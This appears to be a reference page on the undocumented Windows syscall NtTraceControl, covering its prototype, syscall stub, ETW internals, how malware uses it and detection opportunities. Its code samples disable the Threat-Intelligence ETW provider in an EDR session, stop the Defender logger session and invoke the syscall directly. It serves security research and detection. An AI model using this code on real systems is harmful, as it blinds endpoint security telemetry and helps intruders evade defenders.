NtTraceControl

Prototype

NTSTATUS NtTraceControl(
  ULONG  FunctionCode,
  PVOID  InBuffer,
  ULONG  InBufferLen,
  PVOID  OutBuffer,
  ULONG  OutBufferLen,
  PULONG ReturnLength
);

Arguments

Syscall IDs by Windows version

Syscall stub

4C 8B D1                  mov r10, rcx
B8 D6 01 00 00            mov eax, 0x1D6
F6 04 25 08 03 FE 7F 01   test byte ptr [0x7FFE0308], 1
75 03                     jne short +3
0F 05                     syscall
C3                        ret
CD 2E                     int 2Eh
C3                        ret

Undocumented notes

The entire user-mode ETW *control surface* sits on top of `NtTraceControl`. `StartTrace`, `StopTrace`, `ControlTraceW`, `QueryTrace`, `FlushTrace`, `EnableTraceEx2`, `EnumerateTraceGuidsEx` — all of them marshal an `EVENT_TRACE_PROPERTIES` (or one of ~30 internal control packets) and dispatch to this one syscall, with `FunctionCode` selecting the operation. The kernel handler `EtwpControlTrace` validates against `SeSystemProfilePrivilege` / `SeDebugPrivilege` for sensitive operations and against the `EtwGuid` security descriptor for provider-level controls. Function 7 (`EnableTraceProvider`) is the one that turns providers on and off inside an existing session — and the one attackers care about. The SSN drifts roughly every Windows release, so any hardcoded number breaks across builds; `0x1D6` on Win11 24H2 / Server 2025.

Common malware usage

**The major ETW bypass surface.** The textbook user-mode ETW patch (overwrite `ntdll!EtwEventWrite` first byte with `0xC3`) only blinds the *current process*. Defenders who want process-wide telemetry — most notably the `Microsoft-Windows-Threat-Intelligence` provider used by EDR — collect it from a system-wide session. To silence that, attackers reach for `NtTraceControl` with `FunctionCode=7` (`EtwpEnableTraceProvider`) and `EnableState=0` to *disable* the provider in the EDR's own session, or `FunctionCode=2` (`EtwpStopTrace`) to tear the session down outright. **Cobalt Strike**, **Brute Ratel C4**, **Havoc**, **Nighthawk**, and the open-source **SharpEtwBypass** / **TamperETW** all ship variants of this. Kernel-mode counterparts (Lazarus **FudModule** rootkit) achieve the same by zeroing `EtwThreatIntProvRegHandle` directly — a different primitive that bypasses `NtTraceControl` entirely but produces the same blackout. Disabling a session also requires that the calling process either own the session or hold `SeSystemProfilePrivilege` / TrustedInstaller-level trust, which is why most chains pivot through a SYSTEM-context payload first.

Detection opportunities

Hook-based AVs cannot see this — by definition the attacker is disabling the telemetry. The kernel-side detection is to *not depend on the session being alive*: register a second, redundant ETW Threat-Intelligence consumer from a kernel driver (PPL EDR drivers do this), or use the `Microsoft-Windows-Kernel-EventTracing` provider, which logs administrative events (4 = SessionStop, 12 = TraceConfigChange) to itself. Watch for any non-Microsoft-signed process invoking `ControlTraceW` against well-known EDR session names (`DefenderApiLogger`, `EventLog-Security`, `MS_Mon_*`, vendor-specific). On Server 2022+ the Windows Defender for Endpoint sensor logs ETW session tampering directly as an alert. At the kernel level, `EtwThreatIntProvRegHandle == NULL` while the system is supposedly running with TI logging enabled is the smoking gun for the BYOVD variant.

Direct syscall examples

// Disable Microsoft-Windows-Threat-Intelligence (GUID {f4e1897c-bb5d-5668-f1d8-040f4d8dd344})
// inside an existing logger session. Requires SeSystemProfilePrivilege or session ownership.
#include <windows.h>
#include <evntrace.h>

static const GUID kThreatIntel =
    { 0xf4e1897c, 0xbb5d, 0x5668, { 0xf1,0xd8,0x04,0x0f,0x4d,0x8d,0xd3,0x44 } };

void disable_ti_in_session(TRACEHANDLE hSession) {
    ENABLE_TRACE_PARAMETERS p = { 0 };
    p.Version = ENABLE_TRACE_PARAMETERS_VERSION_2;
    EnableTraceEx2(
        hSession,
        &kThreatIntel,
        EVENT_CONTROL_CODE_DISABLE_PROVIDER, // -> NtTraceControl FunctionCode=7, EnableState=0
        TRACE_LEVEL_NONE,
        0, 0, 0, &p);
}

// Tears the whole session down — EtwpStopTrace via NtTraceControl FunctionCode=2.
BYTE buf[sizeof(EVENT_TRACE_PROPERTIES) + 1024] = { 0 };
EVENT_TRACE_PROPERTIES* props = (EVENT_TRACE_PROPERTIES*)buf;
props->Wnode.BufferSize = sizeof(buf);
props->LoggerNameOffset = sizeof(EVENT_TRACE_PROPERTIES);

ULONG st = ControlTraceW(
    0,
    L"DefenderApiLogger",     // typical Microsoft Defender ETW session
    props,
    EVENT_TRACE_CONTROL_STOP);

; The SSN drifts per build — resolve dynamically with Halo's Gate for portability.
NtTraceControl PROC
    mov  r10, rcx
    mov  eax, 1D6h
    syscall
    ret
NtTraceControl ENDP

MITRE ATT&CK mappings

• T1562.006Impair Defenses: Indicator Blockingmitre ↗
• T1562Impair Defensesmitre ↗
• T1106Native APImitre ↗